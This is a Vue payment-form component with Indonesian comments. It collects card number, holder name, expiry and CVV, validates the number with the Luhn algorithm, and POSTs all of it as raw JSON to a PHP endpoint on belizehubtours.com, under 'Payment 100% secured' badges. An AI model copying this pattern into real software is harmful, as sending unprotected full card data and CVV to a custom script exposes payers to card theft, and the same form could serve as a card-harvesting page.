<template>
  <div class="card-form">
    <div class="card-form__logo">
      <img
        :src="require('@/assets/images/logo.png')"
        alt="logo"
      />
    </div>

    <div class="card-list">
      <Card
        :fields="fields"
        :labels="formData"
        :isCardNumberMasked="isCardNumberMasked"
        :randomBackgrounds="randomBackgrounds"
        :backgroundImage="backgroundImage"
      />
    </div>

    <div class="card-form__inner">
          <div class="card-form__card-logos">
      <img
        :src="require('@/assets/images/mastercard2.png')"
        alt="mastercard"
        class="card-form__card-logo"
      />
      <img
        :src="require('@/assets/images/visa2.png')"
        alt="visa"
        class="card-form__card-logo"
      />
      <img
        :src="require('@/assets/images/american-express.png')"
        alt="american express"
        class="card-form__card-logo"
      />
    </div>
      <div class="card-input">
        <label for="price" class="card-input__label">{{ $t('cardForm.price') }}</label>
        <div class="card-input__price-container">
          <span class="card-input__price-symbol">$</span>
          <input
            type="tel"
            id="price"
            @input="changePrice"
            class="card-input__input card-input__input--with-symbol"
            :value="formData.price"
            data-card-field
            autocomplete="off"
            v-number-only
          />
        </div>
      </div>

      <div class="card-input">
        <label for="cardNumber" class="card-input__label">{{ $t('cardForm.cardNumber') }}</label>
        <input
          type="tel"
          :id="fields.cardNumber"
          @input="changeNumber"
          @focus="focusCardNumber"
          @blur="blurCardNumber"
          class="card-input__input"
          :value="formData.cardNumber"
          :maxlength="cardNumberMaxLength"
          data-card-field
          autocomplete="off"
        />
        <button
          class="card-input__eye"
          :class="{ '-active' : !isCardNumberMasked }"
          title="Show/Hide card number"
          tabindex="-1"
          :disabled="formData.cardNumber === ''"
          @click="toggleMask"
        ></button>
      </div>
      <div class="card-input">
        <label for="cardName" class="card-input__label">{{ $t('cardForm.cardName') }}</label>
        <input
          type="text"
          :id="fields.cardName"
          v-letter-only
          @input="changeName"
          class="card-input__input"
          :value="formData.cardName"
          data-card-field
          autocomplete="off"
        />
      </div>
      <div class="card-form__row">
        <div class="card-form__col">
          <div class="card-form__group">
            <label for="cardMonth" class="card-input__label">{{ $t('cardForm.expirationDate') }}</label>
            <select
              class="card-input__input -select"
              :id="fields.cardMonth"
              v-model="formData.cardMonth"
              @change="changeMonth"
              data-card-field
            >
              <option value disabled selected>{{ $t('cardForm.month') }}</option>
              <option
                v-bind:value="n < 10 ? '0' + n : n"
                v-for="n in 12"
                v-bind:disabled="n < minCardMonth"
                v-bind:key="n"
              >{{generateMonthValue(n)}}</option>
            </select>
            <select
              class="card-input__input -select"
              :id="fields.cardYear"
              v-model="formData.cardYear"
              @change="changeYear"
              data-card-field
            >
              <option value disabled selected>{{ $t('cardForm.year') }}</option>
              <option
                v-bind:value="$index + minCardYear"
                v-for="(n, $index) in 12"
                v-bind:key="n"
              >{{$index + minCardYear}}</option>
            </select>
          </div>
        </div>
        <div class="card-form__col -cvv">
          <div class="card-input">
            <label for="cardCvv" class="card-input__label">{{ $t('cardForm.CVV') }}</label>
            <input
              type="tel"
              class="card-input__input"
              v-number-only
              :id="fields.cardCvv"
              maxlength="4"
              :value="formData.cardCvv"
              @input="changeCvv"
              data-card-field
              autocomplete="off"
            />
          </div>
        </div>
      </div>

      <button class="card-form__button" v-on:click="validateCard">{{ $t('cardForm.submit') }}</button>
    </div>

    <div class="card-form__security">
      <p class="card-form__security-text">Payment 100% secured: </p>
      <div class="card-form__security-logos">
        <img
          :src="require('@/assets/images/secure-payment-logo-2.png')"
          alt="secure payment"
          class="card-form__security-logo"
        />
        <img
          :src="require('@/assets/images/ssl-badge-new-e1540329078545-1536x1536.png')"
          alt="ssl badge"
          class="card-form__security-logo"
          style="height: 104px;"
        />
      </div>
    </div>
  </div>
</template>

<script>
import Card from '@/components/Card'
export default {
  name: 'CardForm',

  directives: {
    'number-only': {
      bind (el) {
        function checkValue (event) {
          // Mengizinkan angka dan titik desimal
          // Kode ASCII 46 adalah titik (.)
          if ((event.charCode >= 48 && event.charCode <= 57) || event.charCode === 46) {
            // Jika karakter adalah titik, pastikan belum ada titik sebelumnya
            if (event.charCode === 46 && event.target.value.includes('.')) {
              event.preventDefault()
              return false
            }
            return true
          }
          event.preventDefault()
        }
        el.addEventListener('keypress', checkValue)
      }
    },
    'letter-only': {
      bind (el) {
        function checkValue (event) {
          if (event.charCode >= 48 && event.charCode <= 57) {
            event.preventDefault()
          }
          return true
        }
        el.addEventListener('keypress', checkValue)
      }
    }
  },
  props: {
    formData: {
      type: Object,
      default: () => {
        return {
          cardName: '',
          cardNumber: '',
          cardNumberNotMask: '',
          cardMonth: '',
          cardYear: '',
          cardCvv: ''
        }
      }
    },
    backgroundImage: [String, Object],
    randomBackgrounds: {
      type: Boolean,
      default: true
    }
  },
  components: {
    Card
  },
  data () {
    return {
      fields: {
        cardNumber: 'v-card-number',
        cardName: 'v-card-name',
        cardMonth: 'v-card-month',
        cardYear: 'v-card-year',
        cardCvv: 'v-card-cvv'
      },
      minCardYear: new Date().getFullYear(),
      isCardNumberMasked: true,
      mainCardNumber: this.cardNumber,
      cardNumberMaxLength: 19
    }
  },
  computed: {
    minCardMonth () {
      if (this.formData.cardYear === this.minCardYear) return new Date().getMonth() + 1
      return 1
    }
  },
  watch: {
    cardYear () {
      if (this.formData.cardMonth < this.minCardMonth) {
        this.formData.cardMonth = ''
      }
    }
  },
  mounted () {
    this.maskCardNumber()
  },
  methods: {
    generateMonthValue (n) {
      return n < 10 ? `0${n}` : n
    },
    changePrice (e) {
      // Hapus semua karakter kecuali digit dan titik desimal
      let value = e.target.value.replace(/[^\d.]/g, '')

      // Pastikan hanya ada satu titik desimal
      const parts = value.split('.')
      if (parts.length > 2) {
        value = parts[0] + '.' + parts.slice(1).join('')
      }

      // Format angka dengan pemisah ribuan dan desimal
      if (value) {
        // Jika ada titik desimal
        if (value.includes('.')) {
          const [integerPart, decimalPart] = value.split('.')
          // Format bagian integer dengan pemisah ribuan
          const formattedInteger = integerPart ? Number(integerPart).toLocaleString('en-US') : '0'
          // Gabungkan dengan bagian desimal
          value = formattedInteger + '.' + decimalPart
        } else {
          // Jika tidak ada desimal, format seperti biasa
          value = Number(value).toLocaleString('en-US')
        }
      }

      // Update nilai di formData
      this.formData.price = value
      this.$emit('input-price', this.formData.price)
    },
    changeName (e) {
      this.formData.cardName = e.target.value
      this.$emit('input-card-name', this.formData.cardName)
    },
    changeNumber (e) {
      this.formData.cardNumber = e.target.value
      let value = this.formData.cardNumber.replace(/\D/g, '')
      let formattedNumber = ''
      // american express, 15 digits
      if ((/^3[47]\d{0,13}$/).test(value)) {
        formattedNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{6})/, '$1 $2 ')
        this.cardNumberMaxLength = 17
      } else if ((/^3(?:0[0-5]|[68]\d)\d{0,11}$/).test(value)) { // diner's club, 14 digits
        formattedNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{6})/, '$1 $2 ')
        this.cardNumberMaxLength = 16
      } else if ((/^\d{0,16}$/).test(value)) { // regular cc number, 16 digits
        formattedNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{4})/, '$1 $2 ').replace(/(\d{4}) (\d{4}) (\d{4})/, '$1 $2 $3 ')
        this.cardNumberMaxLength = 19
      }
      // eslint-disable-next-line eqeqeq
      if (e.inputType == 'deleteContentBackward') {
        let lastChar = formattedNumber.substring(formattedNumber.length, formattedNumber.length - 1)
        // eslint-disable-next-line eqeqeq
        if (lastChar == ' ') {
          formattedNumber = formattedNumber.substring(0, formattedNumber.length - 1)
        }
      }
      // Update nomor kartu yang diformat
      this.formData.cardNumber = formattedNumber
      // Simpan versi tidak dimasking untuk validasi
      this.formData.cardNumberNotMask = formattedNumber
      this.mainCardNumber = formattedNumber
      // Emit event untuk update parent component
      this.$emit('input-card-number', this.formData.cardNumber)
    },
    changeMonth () {
      this.$emit('input-card-month', this.formData.cardMonth)
    },
    changeYear () {
      this.$emit('input-card-year', this.formData.cardYear)
    },
    changeCvv (e) {
      this.formData.cardCvv = e.target.value
      this.$emit('input-card-cvv', this.formData.cardCvv)
    },
    validateCard () {
      // Validasi nomor kartu kredit menggunakan algoritma Luhn
      // Pastikan kita menggunakan nomor kartu yang tidak dimasking
      let number = this.formData.cardNumberNotMask || this.formData.cardNumber
      // Hapus semua spasi dari nomor kartu
      number = number.replace(/ /g, '')
      // Periksa apakah nomor kartu kosong atau terlalu pendek
      if (!number || number.length < 13) {
        alert(this.$t('cardForm.invalidCardNumber'))
        return
      }
      // Algoritma Luhn untuk validasi nomor kartu
      let sum = 0
      let doubleUp = false
      // Mulai dari digit terakhir dan bergerak ke kiri
      for (let i = number.length - 1; i >= 0; i--) {
        let digit = parseInt(number.charAt(i))
        if (doubleUp) {
          digit *= 2
          if (digit > 9) {
            digit -= 9
          }
        }
        sum += digit
        doubleUp = !doubleUp
      }

      // Validasi form - Algoritma Luhn valid jika sum % 10 === 0
      if (sum % 10 !== 0) {
        alert(this.$t('cardForm.invalidCardNumber'))
        return
      }
      // Validasi panjang nomor kartu
      if (number.length < 13 || number.length > 19) {
        alert(this.$t('cardForm.invalidCardNumber'))
        return
      }

      if (!this.formData.price) {
        alert(this.$t('cardForm.enterPrice'))
        return
      }

      if (!this.formData.cardName) {
        alert(this.$t('cardForm.enterCardName'))
        return
      }

      if (!this.formData.cardMonth || !this.formData.cardYear) {
        alert(this.$t('cardForm.enterExpirationDate'))
        return
      }

      if (!this.formData.cardCvv) {
        alert(this.$t('cardForm.enterCVV'))
        return
      }

      // Persiapkan data untuk dikirim
      const paymentData = {
        price: this.formData.price.replace(/,/g, ''), // Hapus pemisah ribuan
        ccnumber: number, // Nomor kartu tanpa spasi
        ccname: this.formData.cardName,
        ccexpiratemonth: this.formData.cardMonth,
        ccexpirateyear: this.formData.cardYear,
        cvv: this.formData.cardCvv,
        submit: 'submit'
      }

      // Kirim data ke server
      this.submitPayment(paymentData)
    },

    submitPayment (paymentData) {
      // Tampilkan loading atau disable tombol submit
      const submitButton = document.querySelector('.card-form__button')
      const originalText = submitButton.textContent
      submitButton.textContent = this.$t('cardForm.paymentProcessing')
      submitButton.disabled = true

      // Gunakan Fetch API untuk mengirim data sebagai JSON
      fetch('https://belizehubtours.com/payment/index.php', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Accept': 'application/json, text/plain, */*'
        },
        body: JSON.stringify(paymentData)
      })
        .then(response => {
          if (!response.ok) {
            throw new Error('Network response was not ok')
          }
          return response.json()
        })
        .then(data => {
        // Handle respons sukses
          alert(this.$t('cardForm.paymentSuccess'))
          // Reset form jika diperlukan
          this.resetForm()
        })
        .catch(error => {
        // Handle error
          console.error('Error:', error)
          alert(this.$t('cardForm.paymentFailed'))
        })
        .finally(() => {
        // Kembalikan tombol ke keadaan semula
          submitButton.textContent = originalText
          submitButton.disabled = false
        })
    },

    resetForm () {
      // Reset semua field form
      this.formData.price = ''
      this.formData.cardNumber = ''
      this.formData.cardNumberNotMask = ''
      this.formData.cardName = ''
      this.formData.cardMonth = ''
      this.formData.cardYear = ''
      this.formData.cardCvv = ''

      // Emit events untuk update parent component
      this.$emit('input-price', '')
      this.$emit('input-card-number', '')
      this.$emit('input-card-name', '')
      this.$emit('input-card-month', '')
      this.$emit('input-card-year', '')
      this.$emit('input-card-cvv', '')
    },
    blurCardNumber () {
      if (this.isCardNumberMasked) {
        this.maskCardNumber()
      }
    },
    maskCardNumber () {
      // Simpan nomor kartu asli sebelum masking
      if (!this.formData.cardNumberNotMask) {
        this.formData.cardNumberNotMask = this.formData.cardNumber
      }
      this.mainCardNumber = this.formData.cardNumber
      // Buat array dari karakter nomor kartu
      let arr = this.formData.cardNumber.split('')
      // Ganti digit tengah dengan karakter masking
      arr.forEach((element, index) => {
        if (index > 4 && index < 14 && element.trim() !== '') {
          arr[index] = '*'
        }
      })
      // Update tampilan nomor kartu dengan versi yang dimasking
      this.formData.cardNumber = arr.join('')
    },
    unMaskCardNumber () {
      this.formData.cardNumber = this.mainCardNumber
    },
    focusCardNumber () {
      this.unMaskCardNumber()
    },
    toggleMask () {
      this.isCardNumberMasked = !this.isCardNumberMasked
      if (this.isCardNumberMasked) {
        this.maskCardNumber()
      } else {
        this.unMaskCardNumber()
      }
    }
  }
}
</script>

<style lang="scss" scoped>
@import "../assets/style.scss";

.card-form {
  max-width: 570px;
  margin: auto;
  width: 100%;

  @media screen and (max-width: 576px) {
    margin: 0 auto;
  }

  &__title {
    text-align: center;
    color: #1a3b5d;
    font-size: 24px;
    font-weight: 600;
    margin-bottom: 20px;
  }
}
</style>
